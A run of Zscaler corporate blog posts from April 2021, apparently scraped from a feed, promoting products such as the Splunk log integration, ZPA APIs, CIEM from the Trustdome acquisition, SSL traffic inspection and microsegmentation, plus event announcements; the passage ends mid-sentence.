streaming ingestion of Zscaler logs and dashboards Robust analytics including Risk Based Alerting (RBA) and User and Entity Behavior Analysis (UEBA) to identify suspicious/malicious behaviors A centralized single pane of glass to remediate incidents Zero trust analytics dashboards that incorporate data from multiple sources, including Zscaler, to provide end-to-end visibility Automation and orchestration of triage, investigation, and response to stop threat actors before they can do damage Centralized security controls and policy management, which can be used to enact changes to the Zscaler platform in addition to other tools Accelerate time-to-value with Cloud NSS log streaming Cloud NSS is Zscaler's innovative new cloud-to-cloud data streaming service that makes it even faster and easier to deploy, manage, and scale log ingestion from Zscaler to Splunk Cloud. This service enables native ingestion of Zscaler’s rich cloud security telemetry to enrich investigation and threat hunting for cloud-first organizations – and is configurable in a matter of clicks. Splunk Cloud correlates the Zscaler telemetry with an organization’s other high-value data sources, providing full visibility into actionable data for investigations within one centralized console. Zscaler’s cloud-native security architecture dramatically reduces the attack surface and provides full inline scanning and analytics, and sends high-resolution telemetry logs directly to Splunk using the cloud-to-cloud log streaming service. The Zscaler app for Splunk further allows for SecOps teams to visualize Zscaler’s threat protection with detailed dashboards and prebuilt queries. Customers benefit from: Fast, reliable integration: Get immediate visibility with pre-built integrations. Splunk and Zscaler work together seamlessly, with high-resolution telemetry data normalized and ingested directly into Splunk. Increase reliability and scalability by sending all logs directly to Splunk via the Splunk HTTP Event Collector with no middleware. Simplified Management: No additional appliances to manage for logging. Direct cloud-to-cloud integration is managed by Zscaler and Splunk. Let your analysts spend more time on preventing, investigating, and mitigating threats and less time on administering logging pipelines. We are extremely excited to offer our customers the benefits of this partnership with Splunk, and look forward to continued collaboration on zero trust. To learn more, check out the Zscaler + Splunk solution brief. If you're already a Zscaler and Splunk customer, download the Zscaler App for Splunk from Splunkbase today. Mon, 26 Apr 2021 09:00:01 -0700 Mark Brozek Best-selling Author Ben Mezrich Joins Zenith Live as Keynote Speaker Zenith Live, the world’s largest cloud transformation conference, is right around the corner—but that hasn’t stopped us from adding to our impressive list of executive and future-forward keynote speakers. Today, we’re excited to announce our latest addition to this year’s event: Ben Mezrich. In his keynote, An Interview with Ben Mezrich: A Glimpse Inside the Rise of Bitcoin and the Modern Tech World, Mezrich will walk through the story behind his latest book, Bitcoin Billionaires, while sharing his unique view on the future of cryptocurrency, the world’s economic future, and, of course, the real story behind the infamous Winklevoss brothers—the world’s first Bitcoin billionaires. From the twins’ falling-out with Mark Zuckerberg, to a beach in Ibiza, to the emergence of the Silk Road—and subsequent SEC hearings—Bitcoin Billionaires exposes the true story behind the brothers’ attempts for redemption and revenge in the wake of their epic legal battle with Facebook. Not only is this story wildly entertaining, Mezrich uses it as a springboard to comment on the future of currency and digital economics, weaving together the complexities of emerging technology and humanity. Mezrich will be recounting this story and sharing his perspective on the ways that cloud computing is reshaping the world as we know it—all in a candid interview with Zscaler CMO, Chris Kozup at Zenith Live. You won’t want to miss this! Here’s how to register. What you can expect at Zenith Live 21 Zenith Live is a virtual conference focused on secure digital transformation, showcasing what’s possible with the flexibility of true zero trust. With over fifty breakout sessions across six tracks, hands-on training, executive forums, and architecture workshops, Zenith Live is designed to show IT leaders across all disciplines how to lead an organization securely into the modern era, where you can innovate faster, reduce risk, and work smarter—all at the speed of cloud. In addition to Mezrich’s keynote, here’s what else you can expect at this year’s event: Expert speakers Hear visionary predictions for the future of the digital world and how CIO, CTO, and CISO pioneers from Fortune 500 companies successfully enacted their secure digital transformation initiatives. In-depth breakout sessions Select from over 50 sessions in six tracks: Foundations Zscaler Expert CloudOps/DevSecOps Network Professional Security Professional Public Sector Architecture Workshops Zscaler experts teach an interactive session on how a zero trust architecture can free you from past constraints so you can move securely to the digital future—at cloud speed. Women in IT Exchange A fireside chat with IT leaders on professional directions and practical approaches to breaking down the barriers to individual success. Live Q&A/Demos Zscaler professionals lead hands-on interactive training sessions on Zscaler’s Zero Trust Exchange Technology. Training Zscaler cloud operations and cybersecurity experts will lead detailed hands-on technical training and certification programs. Register now for this one-of-a-kind, two-day immersive experience. Wed, 21 Apr 2021 20:31:25 -0700 Jessica Hofmann Announcing REvolutionaries, the Revolutionary New CXO Community, and the Zero Trust Academy Digital transformation requires zero trust. But successfully adopting zero trust requires not only getting the right platform but driving the entire organization to adopt a new cultural mindset. Roadmaps must be shared, business and IT priorities must align, and silos must be torn down. The new CXO must be both an innovator and a strategist, applying technology and architecture to drive measurable outcomes for the business. The Customer Experience and Transformation team at Zscaler comprises former CIOs, CISOs, CTOs, and heads of network, security, and architecture from prominent global organizations. These former practitioners bring their own real-world zero trust experience and expertise to their roles. They partner closely with Zscaler customer CXOs and future customers who are embarking on their own digital transformation journeys. Today, I'm proud to announce the launch of two key programs, The Zero Trust Academy and the REvolutionaries CXO Community. First, we all share a collective mission to advance the skills of the security-practitioner community. To that end, Zscaler has created the Zero Trust Academy, a certification training program focused on securing connectivity to private apps, SaaS applications, and the internet with the Zscaler Zero Trust Exchange. Second, digital transformation requires buy-in from and deep engagement with the C-suite and IT leadership. To empower, foster, and connect these leaders, we’re launching the Zscaler REvolutionaries Community. Zero Trust REvolutionaries are true pioneers. The REvolutionaries forum brings together visionary tech leaders to showcase zero trust success stories, share digital transformation best practices, participate in CXO-driven industry events, and connect with like-minded innovators. Featured media will include practical and actionable thought leadership content, industry case studies, news, as well as the latest cybersecurity research from the Zscaler ThreatLabZ team. Through highlighting successful thought leadership, events, insights, and community, we can help other enterprise leaders, we can push forward new technology architectures that will allow businesses to excel at their mission, and we can set standards for a new digital future that lives securely in the cloud. It's time to seize the zero trust moment. Join me and other CXO REvolutionaries at Tue, 20 Apr 2021 05:00:01 -0700 Kavitha Mariappan Simplifying Security: Automation is the Way Forward with ZPA Network engineers looking to automate processes for private applications: look no further. Zscaler Private Access (ZPA) now has API capabilities to help manage and operate secure access to private applications, eliminating the need for manual intervention and thus saving resources and removing the possibility of human error in the process. Whether you are part of a large enterprise or are looking to implement large-scale deployment projects, automation is key. Many projects handled by IT teams demand dynamic changes and quick action, potentially disrupting project flow. Having an automated process to manage these rapid changes can help create a more efficient environment for the DevOps team, security engineers, and network engineers. ZPA APIs: Simplifying security through automation ZPA APIs are designed to help streamline the app discovery process. Coupled with segmentation, ZPA APIs make it easy to scale secure access to private applications, keeping the security and end-user experience intact. ZPA APIs automatically create policies for newly discovered services and revoke access for users based on predetermined settings. We have also introduced machine learning capabilities that allow for auto-segmentation of application workloads, simplifying the adoption and continuity of zero trust. Automated workflow Automation is key to achieving consistency and avoiding redundant tasks. ZPA APIs can help create application segments and automatically add specific applications to the existing segments, reducing your involvement in repetitive tasks and simplifying the entire application segmentation process. When IT teams are required to lock down network routers or switches based on port access, ZPA APIs assist in defining and segmenting applications. Using APIs for this process allows granular policy definition without the need for involvement every time a new router or switch is provisioned. Adapting to a dynamic workload environment IT teams need to launch and terminate cloud instances in AWS or Azure for testing purposes or to utilize allotted spot instances. In a dynamic environment, manually updating policies is almost impossible to manage. ZPA APIs automate policy updates for your constantly changing environments without the need for you to define wildcards in the ZPA dashboard. Reduce the chance of error ZPA can discover applications in your network using specific domain names and IP subnets. Adding these applications to app segments is currently possible using the ZPA dashboard. With ZPA API, these discovered apps are extracted and added to existing application segments using a script, without requiring you to add them one by one. In addition, new app segments can be defined with granular access policies through the scripts, resulting in automation that reduces human error. Streamline and standardize processes In addition to savings on resources, time, effort, and money, ZPA APIs standardize processes, thereby increasing scalability. Organizations work with hundreds of applications and/or application segments. ZPA APIs make repeatable work easy to handle. To learn more about Zscaler Private Access and the new APIs, watch this video. To hear from Zscaler experts on how ZPA APIs can benefit your organization, request a demo. Additional Capabilities: The Zscaler Private Access (ZPA) API gives you programmatic access to manage the following ZPA features: Application Segments Segment Groups Application Servers Server Groups Access Policies Client Forwarding Policies Timeout Policies Tue, 20 Apr 2021 05:00:01 -0700 Kanishka Pandit CIEM vs. CSPM: Which is Better for Reducing Public Cloud Risk? The vast majority of public cloud security incidents are the customer’s own fault. Most prominent among these has been the huge number of AWS S3 bucket exposures over the last several years, with big names like Verizon, Accenture, the Republican National Committee, and even The Pentagon falling victim. While these incidents might have gotten an inordinate amount of press coverage, they are far from the only type of issue causing security incidents in the public cloud. From a macro standpoint, these issues fall under two categories: misconfigurations and excessive permissions. Two new categories of tools, Cloud Security Posture Management (CSPM) and Cloud Infrastructure Entitlement Management (CIEM), have emerged to solve these challenges. The question is, which technology will better help you reduce risk while embracing public cloud? Reducing public cloud misconfigurations CSPM tools are built to solve public cloud misconfiguration issues, such as the aforementioned AWS S3 bucket exposures. Across the big three cloud providers, Microsoft Azure offers more than 600 services, AWS over 200, and GCP over 100 distinct services. Each of these services has configuration options that impact security and risk, and they are evolving very rapidly. With most organizations now adopting a multicloud strategy, there are thousands of feature configurations for infosec teams to monitor. CSPM tools help organizations monitor and prioritize configuration issues across their public cloud environments, addressing both security and compliance requirements. These tools inventory everything running across multi-cloud deployments, calculate security posture across 100s of services, use risk to prioritize issues, automatically remediate, and then enforce guardrails to ensure ongoing compliance. Addressing excessive public cloud permissions CIEM is a newer category than CSPM, built to address security gaps left by CSPM tools that focus exclusively on misconfigurations. These tools address the inadequate control over identities and privileges that has become prevalent in public cloud deployments. An organization with hundreds of cloud users and tens of thousands of resources will have tens of millions of individual entitlements to manage—this is far from a human-scale problem. CIEM helps organizations discover who can access what, how permissions are utilized across human and non-human identities, build and enforce a simple and transparent least-privileged permissions model, and implement a multicloud guardrail policy for entitlements. CSPM vs. CIEM: Which do you need? So, given the importance of these tools for reducing cloud risk, which do you need to deploy in your environment? The answer is both. Misconfigurations and excessive permissions are both major causes of public cloud security incidents that need to be addressed. Together, these products can minimize the vast majority of issues that have plagued cloud security to date. With our recent acquisition of Trustdome and their innovative CIEM platform, Zscaler has bundled CIEM and CSPM together as part of our comprehensive Zscaler Cloud Protection (ZCP) solution. I’d encourage you to reach out to Zscaler to take a closer look at how we can help address the biggest sources of risk in your public cloud deployments. Thu, 22 Apr 2021 08:00:01 -0700 Rich Campagna The Advantage of Implicit DIStrust in Traffic Inspection Zero trust comes up in almost every conversation I have. It's definitely THE hot topic across the industry right now. And yet, I see confusion in terms of how, when, and where to get started with it. The National Institute of Standards and Technology (NIST) and other organizations have put out communication around it, and there are some clean starts to definitions around zero trust. The good news is this means you don’t have to address everything all at once—you can choose one focus area at a time. Based on my career as a security professional, I think a good starting point is the concept of zero trust in the category of traffic inspection. How encrypted traffic is giving bad actors opportunity At Zscaler, we approach zero trust as a mindset centered around having an implicit distrust of all traffic. Bad actors excel at exploiting vulnerabilities, and by inherently trusting no one, organizations have better control and can avoid cyberthreats and subsequent data compromise. In terms of traffic inspection, the level of encrypted internet traffic users interact with—whether it is HTTPS or Port 443—has crept up slowly over a long period of time. Users and IT managers have come to implicitly trust SSL encryption, and organizations are looking at that encrypted traffic and saying, “I'm going to grant implicit trust to that SSL traffic and I'm going to allow it to pass through.” The problem is that encrypted traffic cannot be trusted, and last year, 80 percent of all cloud traffic was SSL encrypted. In the last six months of 2018 alone, Zscaler blocked 1.7 billion SSL threats. We see malicious actors taking advantage of the implicit trust people give SSL, using it as a threat vector to individual environments. I don’t think any IT security professional is granting this implicit trust to SSL because they believe all that traffic is trustworthy. Rather, it's the fact that inspecting all of it is a monumental challenge for many organizations. Purchasing and managing a number of appliances to break and inspect all this traffic is a heavy lift. Why implicit distrust matters The oldest security game in the book is adversary and defender. It predates the digital age, going back to the days of cops and robbers. The bad guy identifies and exploits a vulnerability and then the security professionals, the good guys, patch and defend against that individual exploit. And then the bad guys find a new vulnerability because attackers are always going to excel at figuring out where vulnerability exists. Implicit trust of encrypted internet traffic is a vulnerability malicious actors use today to great effect, and they will continue to do so into the future. Zero implicit trust (or implicit distrust) is a solid counter to that strategy. For example, in an internal security program, there are URLs deemed as safe or unsafe for internet users. The addresses deemed safe are usually given implicit trust because the site is “safe.” Bad actors can spot this site specifically and commit a watering hole attack, plant malicious content, or create a redirect from a good node to a bad. The bad actor places this traffic inside SSL over Port 443. It's got the HTTPS, so it will be encrypted because the bad actors understand that encrypted traffic has access to many places in a position of trust where it's not going to reach the same level of inspection as other pieces of traffic. The traffic is allowed through because it's coming from a known good node. And now the vulnerability has been exploited. The exploit infects the user in this individual case. Even if the traffic will go into a sandbox, that doesn’t always prevent the attack. Due to the cost and time, I often see traffic passed simultaneously as it's being detonated in the sandbox. That means the payload is hitting the target at the same time it’s being flagged as a malicious payload. At this point, the payload is on the target and malicious actors are committing malicious action. This can be anything from internal denial of service to destruction or modification of data to ransoming an internal owner’s data back to them. Does this mean that current security models and methods are bad? No, not at all. An antivirus engine, backended by a threat database with file type static malware analysis is a good, fast, and efficient way to go. However, I think many methods are being used inefficiently because they can only be as good as they are up to date. The fluid nature of the environment in which we all operate means we can only provide a solid depth of protection as we have definitions. If we’re not updating them consistently, that's another vulnerability that malicious actors can use. Cyberattackers are rapidly changing their attacks and methods and coming at environments with different MD5 hashes because if they can relay around this, they can eventually get to the payload target. How security works in a perfect world Dynamic malware analysis has a level of heuristics at the end of that analysis, like a “good/bad” process, to be able to do a level of risk assessment against an individual piece of traffic. If it's deemed suspicious, it goes to a sandbox. In a perfect world, that sandbox blocks the file or piece of traffic from the user until it's determined whether that individual piece of traffic is good or bad. If it's good, it passes it to the user. If it's bad, the user never has the opportunity to interact with it. That payload is never delivered to the host. As soon as the traffic is determined to be malware and should be blocked, the definitions are updated. How this works in an even more perfect world If I've discovered a day zero empty file hash in that sandbox, I immediately want protection against it, right? Now, I could do that inside my own agency and my peers could do it inside their agencies. But what if I had access to a service where I could not only stop that malicious content from accessing the payload landing on my host, but stop it from within a group of users? And those users could do the same. Can I update definitions on my site based on collaboration and discovery of malicious content? Can I gain knowledge of the group dynamic in order to create clean and clear definitions across my enterprise and bank of users? In a perfect world, yes. This is how Zscaler works. Our definitions are updated constantly. We are always pulling from our own sources of data. There is no data known to be bad or malicious that we don’t include in our scan process. We have a method in place when analyzing traffic that allows us to say, “we don't have a definition specifically against this. There's not any MD5 hash to categorize the traffic, so we’ll take a look at it in the sandbox and see what happens.” When we determine an individual piece of traffic is bad, we go back and update those definitions. When that MD5 hash is seen again, we don't have to spend the time cycles and currency sandboxing that individual piece of traffic, which can negatively impact the user experience. For example, we had a customer that had a piece of ransomware and an info stealer Trojan come through unflagged as good or bad because there were no definitions against this individual piece of traffic. However, based upon some analysis and heuristics we did, we determined it was suspicious. It went to the sandbox and was flagged as a problem. The malicious traffic was noted and repopulated back to the scan engines at the top. The next time this traffic came through to this customer and other customers subscribed to the service, the MD5 hash flagged it as known bad and immediately blocked it. We decrypt and inspect all SSL encrypted traffic against a long list of definitions that are as current as they can be. This level of implicit distrust is possible because, as a cloud service, we can have the cloud effect and those databases are kept up to date. I'm able to have a detonation outside of the agency's data center and outside of the internal network, make a determination on file, and that determination is immediately strengthening my scanning process at the top. And that is zero implicit trust (or the advantage of implicit distrust). We can live in a perfect world with a mindset around applying zero trust to the traffic inspection model. Mon, 19 Apr 2021 09:00:01 -0700 Tom Tittermary Entitlements: The Most Overlooked Risk in the Public Cloud Understanding the threat vectors that introduce business risk is an important early step towards developing a strong cybersecurity strategy. The same is true as your organization embraces the public cloud. There are five key areas that can introduce risk when working with the public cloud which must be understood and properly protected. Five key public cloud threat vectors Configuration – This is the realm of cloud security posture management (CSPM) tools. This is where you gain an understanding of the configuration of all of the services and resources in your cloud environments, the corresponding security posture, and misconfigurations that need to be remediated. External exposure – Anything that is exposed to the internet is a potential target for bad actors. But workloads need internet access as well as access to other clouds and to your traditional data centers. Understanding what can be attacked from the outside is absolutely critical. Lateral movement – Even if you’ve appropriately configured all services and have minimized your exposed attack surface, there is still the possibility of someone or something getting in. Knowing and preventing bad actors from moving laterally across your public cloud footprint can help ensure that the impact of any breach is minimized. Crown jewel data and applications – Many organizations are migrating sensitive data and applications to the public cloud. Knowing where these crown jewel assets are and applying additional protections can help minimize the impact of a breach. Entitlements – The final piece of your public cloud attack surface is the one most commonly overlooked: entitlements and permissions. An organization with hundreds of cloud users and thousands of cloud resources will have hundreds of millions of discrete permissions granted. This may include unused permissions, non-federated dormant accounts, misconfigured permissions, and more. Cloud Infrastructure Entitlement Management The emerging category of products addressing the growing cloud permissions problem is known as Cloud Infrastructure Entitlement Management (CIEM). How big is this problem? According to Gartner, “by 2023, 75% of cloud security failures will result from inadequate management of identities, access, and privileges, up from 50% in 2020.”1 This is why we’re so excited to welcome Trustdome to the Zscaler family. Trustdome is an innovator in CIEM, providing permissions security across all cloud environments, while preserving DevOps’ freedom to innovate. The platform provides full governance over who has access to what across all your clouds, resources, identities, and APIs. You get a 360° view of all your permissions and the ability to automatically find misconfigurations and get remediation plans teams can act on, all from one unified platform. And with zero disruption to DevOps, they’re free to deploy code rapidly, freely, and securely. Key use cases for CIEM include: Cloud permission governance – Discover who can access what and how permissions are utilized across human, machine, and external identities Least privileged configuration – Clean up unused, default, and misconfigured permissions, maintaining a simple and transparent permissions model Guardrail enforcement – Implement a unified cloud permissions guardrail policy across major cloud platforms including IaaS, PaaS, and SaaS The Trustdome product will become Zscaler CIEM, a critical element of Zscaler Cloud Protection (ZCP) services. ZCP simplifies and automates zero trust security for workloads on and between any cloud platform, providing comprehensive coverage for all five threat vectors of the public cloud. To learn more about Zscaler CIEM or to schedule a demo please connect with us directly. 1 Gartner, Managing Privileged Access in Cloud Infrastructure, June 9, 2020, ID G00720361 Forward-Looking Statements This blog contains forward-looking statements that are based on our management's beliefs and assumptions and on information currently available to our management. These forward-looking statements include our intention to acquire Trustdome, the timing of when the acquisition will be completed and the expected benefits of the acquisition to Zscaler’s product offerings and to our customers. These forward-looking statements are subject to the safe harbor provisions created by the Private Securities Litigation Reform Act of 1995. A significant number of factors could cause actual results to differ materially from statements made in this blog, including those factors related to our ability to successfully integrate Trustdome technology into our cloud platform and our ability to retain key employees of Trustdome after the acquisition. Additional risks and uncertainties are set forth our most recent Quarterly Report on Form 10-Q filed with the Securities and Exchange Commission (“SEC”) on March 4, 2021, which is available on our website at and on the SEC's website at Any forward-looking statements in this blog are based on the limited information currently available to Zscaler as of the date hereof, which is subject to change, and Zscaler will not necessarily update the information, even if new information becomes available in the future. Thu, 15 Apr 2021 04:45:02 -0700 Rich Campagna Is Microsegmentation a Security Project or an Infrastructure Project? The desired effects of microsegmentation are clear. They include: Limiting the “blast radius” of a data center or cloud environment compromise Preventing lateral movement of threats within the environment (which often facilitates an attack) Supplying fine-grained controls to applications running in the environment (which prevent lateral movement) An effective microsegmentation project defines and analyzes the inherent characteristics of its workloads so that the IT organization can describe what each cloud/data center workload will manage (i.e., what type of data or applications), and how and by whom it will be used. This process allows the organization to accomplish granular segmentation through individual controls that are based on the nature of each workload. Though microsegmentation is an architectural model created to ensure security in the cloud or data center, its implementation and management are not as clear as its intended goals. For one thing, any impact on the network means that networking teams must be involved, and while microsegmentation that is based on software identity does not require any architectural changes, any excess pathways that are not used by the application will be removed. Therefore, any organization considering a microsegmentation project needs to decide who is involved and at what level. The argument for infrastructure Network operations teams are responsible for network, data, and application management inside the organization's network environment. This responsibility is not abdicated when the networking occurs inside a third-party provider environment, in other words, in a public or private cloud. The challenges may be different, but the burden remains the same. Traditionally, networking teams define policies for routers and switches. In the cloud, where a physical boundary isn’t present, NetOps is still required to define rules and policies for how applications and services communicate, even when the tools and techniques differ. Under NetOps’ charge is asset inventory, policy configuration and ongoing management, and traffic analysis, among other things. Accompanying these responsibilities is a requirement to maintain network performance and uptime, whether the infrastructure is on-premises or virtual. It’s these two latter responsibilities which often put networking teams directly into conflict with security teams, and also why the oversight and implementation of microsegmentation projects can be controversial. Microsegmentation projects using traditional tools like firewalls and other address-based technologies are complex and costly. Some of the more common “headwinds” to starting or applying microsegmentation include: Translating network speak into application speak to apply effective policies Managing thousands of policies Managing different sets of policies for on-prem and cloud environments Understanding application dependencies The above bullet points fall under the authority of NetOps, even though SecOps will likely have to be involved. The argument for security Microsegmentation was originally devised as a way to compensate for the vulnerability of flat and overly permissive networks by creating “microperimeters” around critical applications or collections of like data, such as “HR data” or “finance data.” Moving perimeters inside the network allows security practitioners to measure and reduce risk and conduct vulnerability assessments for the environment. These are clear security responsibilities. Similarly, the goals of microsegmentation listed in the bullet points at the top of this document fit squarely into security’s realm. There is, however, significant crossover between SecOps and NetOps. This has been the case for as long as security became its own domain expertise. Security is responsible for what happens when policies are applied to the environment, but networking is responsible for applying the rules. In today’s hyper-aware cyber-incident world, SecOps teams have become more heavily involved in creating and monitoring rules, but the fact remains that security teams will always favor the confidentiality and integrity of workloads over availability. NetOps is the exact opposite. Can’t we all just get along? Zero trust networking is the backbone of many microsegmentation projects, and ironically it’s zero trust that allows for speed and efficiency and optimal security. With least-privileged access at the heart of zero trust, cloud and data center workloads can communicate as intended and necessary while remaining protected. Microsegmentation facilitates cloud workload protection but also means that NetOps and SecOps must come together more closely than ever before to meet business objectives (not just IT and/or security objectives). Many microsegmentation projects fail because they’re too complex, costly, and often the network constructs on which controls are based don’t work well in a virtual environment. As a result, networking and security teams must work together to choose the tools and techniques best suited to implementation and management of microsegmentation. Contrary to industry lore, there is no one or “preferred” way to conduct a microsegmentation project, and few of these projects can be taken on wholesale by any organization. Though improved cybersecurity control—especially for cloud environments—was the desired intention of microsegmentation, networks and networking teams will be affected in terms of resources and performance, understanding baselines, identifying and visualizing abnormal traffic and application flow patterns, and configuring and managing policies. Security teams will need to remain consistently involved with advising on policy refinements to reduce risk of exposure, detecting and responding to possible policy infringements and security incidents, and ensuring technologies and processes are compliant with cybersecurity best practices. OK, so maybe this quick blog post is a bit of a copout. Then again, at the foundation of cybersecurity is NetOps-SecOps collaboration and cooperation. Security grew out of networking, after all, and now as its own, much more complicated discipline, security teams cannot forget that the systems and data they’re charged with protecting are reliant upon good networking practices. Fri, 16 Apr 2021 08:00:01 -0700 Nagraj Seshadri Peanut Butter and Chocolate: Virtual Desktop Infrastructure and Zscaler’s Zero Trust Exchange go together like... Zscaler Private Access (ZPA) and Zscaler Internet Access (ZIA) complement each other to secure Virtual Desktop Infrastructure (VDI) solutions. Like peanut butter and chocolate: Two great things that are great together. A common question: Where should we replace our VDI with ZPA, and where should we leverage the combined solution? Peanut butter and chocolate might taste good when paired, but you can’t substitute one for the other. (Chocolate syrup on spring rolls? No. Just, no. Well, maybe chocolate mole sauce?) Analogously, VDI replacement makes sense in some ZPA scenarios, but doesn’t in others. The answer lies in understanding why you use VDI in the first place. Do your current use cases and applications really still require VDI? Do all users use VDI or just a subset? Asking why and exploring the scope can help to move beyond the assumptions that flow from the traditional on-premise / on-network mindset. Generally, organizations leverage VDI for one or more of the following reasons: Access granularity: Restricting users to only authorized applications Data residency restrictions: Ensuring data a) stays within the corporate boundary, and/or b) is never stored on the end-user’s device Traffic localization: Minimizing latency for heavyweight client-server interactions (e.g., database calls) Desktop management or reduction: Maintaining a clean desktop experience and ensuring a persistent desktop that users can access from multiple devices Software license reduction: Deploying software to a limited pool of virtual desktops, rather than all user devices Legacy application support: Enabling access to applications that require older OSes Traffic inspection: Using VDI to force all traffic through on-premise security stacks If you’re considering option #1, ZPA can replace VDI and provide granular, least-privilege access for authorized users to specific applications. In addition, deploying ZPA with Private Service Edge can address option #2a, ensuring that both the control plane and data plane stay entirely within your security boundary for private traffic. (And Zscaler’s upcoming integration of Cloud Browser Isolation with ZPA will start to address option #2b, as well.) For all of the other options, you can add Zscaler to your existing VDI environment to augment the benefits described above. Whether your VDI environment is on-premise (e.g., Citrix XenDesktop, VMware Horizon) or Desktop-as-a-Service (e.g., Amazon WorkSpaces, Windows Virtual Desktop), Zscaler lets you layer granular, cloud-native zero trust access over virtual desktop offerings. In this great-tastes-that-go-better-together scenario, Zscaler provides centralized visibility and control for users accessing resources from VDI environments. Installing the Zscaler Client Connector on virtual desktop instances gives visibility and centralized control over what the user can access from there. We have real-world examples of Zscaler customers deploying Zscaler Client Connector in their DaaS environments to protect external and SaaS traffic, via Zscaler Internet Access (ZIA), as well as traffic to private applications via Zscaler Private Access (ZPA). This combined solution offers many benefits: centralized visibility and control, single access control policy config for VDI as well as other forms of access, and consistent user experience—with the caveat that you must have dedicated single-user VDI instances (i.e., what Amazon calls Windows BYOL). An example where this approach makes sense is enabling employees to access private applications directly from their own devices, while restricting third parties to VDI-only access. You can extend ZPA’s centralized visibility and control to both user communities, as illustrated below in Figure 1. Figure 1. How ZPA complements VDI deployments. Even if we don’t replace VDI for all users, often we find that there are many user communities we can serve more simply with ZPA. For financial advisors and insurance agents, many firms have moved to web-based apps (DocuSign, etc.). So there may no longer be a hard requirement for those thousands of users to have VDI. This often requires going beyond the boundaries of the network and security teams and engaging enterprise architects, application owners, etc. ZPA and VDI go great together Replacing or augmenting VDI with ZPA requires a deeper understanding of why you use VDI, and whether it is still a necessary part of your environment. Often, Zscaler’s Zero Trust Exchange trust can remove the necessity for VDI by providing direct access to internal and cloud apps, even if the user is accessing from outside the perimeter. Dig into your assumptions. Replace where you can, combine where it makes more sense. And let me know if you think mole sauce goes well with spring rolls. For additional resources, please visit our Work-from-Anywhere Content Hub. Thu, 15 Apr 2021 08:00:01 -0700 Lisa Lorenzin Join Us Live: Seize the Zero Trust Moment. Accelerate digital transformation with confidence. Join Zscaler for Seize the Zero Trust Moment: a virtual broadcast covering the latest Zscaler innovations, how to implement and leverage zero trust to improve business agility, and personal accounts and stories of digital transformation success. Reserve your spot today. Digital transformation is so much more than migrating a few applications to the cloud, and it’s largely reliant on the Internet as the new corporate network. The benefits of transformation make enterprises more agile, efficient, and modern—but can also make them more vulnerable to attacks if the proper security isn’t in place. Zscaler has helped thousands of customers securely enable their digital transformation through a true zero trust architecture, the Zscaler Zero Trust Exchange. Powered by the world’s largest security cloud, our customers leverage zero trust to securely connect users and applications, prevent data loss, increase visibility into threats, and keep the cloud safe—for all. So, with that in mind, we invite you to our upcoming global broadcast, Seize the Zero Trust Moment. The latest in cloud security will be unveiled. Join us to learn how the latest Zscaler innovations will enable you to accelerate business transformation by embracing zero trust. This broadcast will introduce the technologies, tools, and resources required to protect your business as you embark on your digital journey, including: Taking zero trust to a new level A new normal will be a hybrid workforce where users working both inside and outside the office more prevalently. Zero trust services must be designed to secure this new world, and ensure zero trust for all. A safer world With the internet as the new corporate network, threat actors are devising new ways of stealing data each day. Join us to see how we’re helping customers protect their data. Security doesn’t have to be hard One of the biggest challenges IT security leaders have is that security can be complicated, especially with legacy point products. During our broadcast, we'll dive into how Zscaler aims to make life easier for IT. Hear from some of the world’s top digital transformation experts. We've put together a stellar lineup of IT and security leaders. They will explain how zero trust addresses new business challenges and how Zscaler has helped customers—all with the Zscaler Zero Trust Exchange. Elevating IT together. A security strategy is only as strong as the people driving it and the ecosystem that enables it. That said, Seize the Zero Trust Moment will help elevate the role of IT leaders and executives and empower practitioners through industry-first initiatives. We’ll highlight some of the work being done with some of the world’s most popular security vendors as well. Join us from around the globe. With organizations moving out of the data and into the cloud at record rates, now’s the time for a fundamental shift in how business is done, and how it’s secured. In light of this, we’re bringing this event to every corner of the globe—in three time-zone-friendly sessions: AMERICAS: Tuesday, April 20, 11 AM – 12 PM PT | 2 PM - 3 PM ET APAC: Wednesday, April 21, 10 AM - 11 AM IST | 12:30 PM - 1:30 PM SGT EMEA: Thursday, April 22, 10 AM - 11 AM BST | 11 AM - 12 PM CEST Reserve your spot. When you’re seeking to accelerate digital transformation, it can be difficult to know where to start—but we’re here to show you how you can do it confidently, starting with zero trust. Reserve your spot at Zscaler’s Seize the Zero Trust Moment virtual broadcast. Mon, 12 Apr 2021 14:16:17 -0700 Christopher Hines Let's Talk CASB: The Data Protection Dialogues For a more in-depth look into what it takes to build a comprehensive data protection and security strategy, be sure to check out our new video series, Data Protection Dialogues. Like most progressive companies, you've probably got CASB on your shopping list. Cloud applications have changed everything. Your sensitive data has left yesterday's on-prem networks and is now distributed everywhere, with your users accessing this sensitive information from anywhere but the office. You need more control over your data than ever before; however, legacy, network-centric security tools offer little to none. So, naturally, CASB seems like an easy next step, right? At first, this seems true—especially if you've just started migrating your applications to the public cloud and have been previously relying on more network-centric solutions—because you do obtain more control over your data than before with CASB. However. Most organizations see CASB at surface value—more control and more control is good—and fail to realize that it's only a fraction of an enterprise's complete Data Loss Prevention plan. As you can see, upgrading your data protection strategy takes a whole lot more than just buying a few point products. So, with that in mind, Zscaler CISO Mark Lueck, and VP of product management Moinul Khan have joined me in creating a new video series, Data Protection Dialogues. In these videos, we talk about all things data and how your organization can protect it. In our first episode, we chat about CASB and how it's just a part of a larger data protection strategy. We also discuss why CASB is so hot right now, how CASB converges with SWG and DLP, and practical advice for formulating a fool-proof CASB strategy. But our first episode doesn't stop there. We even address the challenges of securing a remote workforce and enabling secure BYOD access. You can watch this episode on-demand here. What’s new in the world of data protection? For a closer look at solving some challenges you are probably facing right now, with apps and data distributed across clouds, as well as CASB’s role in your data protection strategy, be sure to check out our latest video series, Data Protection Dialogues. Wed, 14 Apr 2021 08:00:01 -0700 Steve Grossenbacher Taking the Micromanagement out of Microsegmentation Enterprise security teams have long been looking for more effective solutions to protect their cloud and data center environments. Once secured solely by perimeter-based technologies, today’s network environments are decidedly past the point of relying on controls at the edges. Out of this need to protect internal communication and east-west traffic arose the adaptation of traditional controls. Firewalls were moved inside the network to create microperimeters. The idea was that one great big “fence” around the outside of the network wasn’t enough, but using the same tools and techniques, enterprise security practitioners could create smaller “secure zones” within the network. Doing so would effectively limit how far network traffic could travel before needing to pass a security “checkpoint.” The concept was simple. Implementation was not. The idea of microsegmentation—firewall rule-based microperimeters—caught on with security practitioners in a big way. Any practitioner worth their salt knows that flat networks mean trouble. Actually microsegmenting data, however, often proves more troublesome than it’s worth. While there is something to be said for “limiting the blast radius” of an internal breach or malware, the cost and people hours required to properly microsegment a network in the traditional sense often don’t support the limited benefits. Challenges with traditional microsegmentation Translating app speak to network speak One 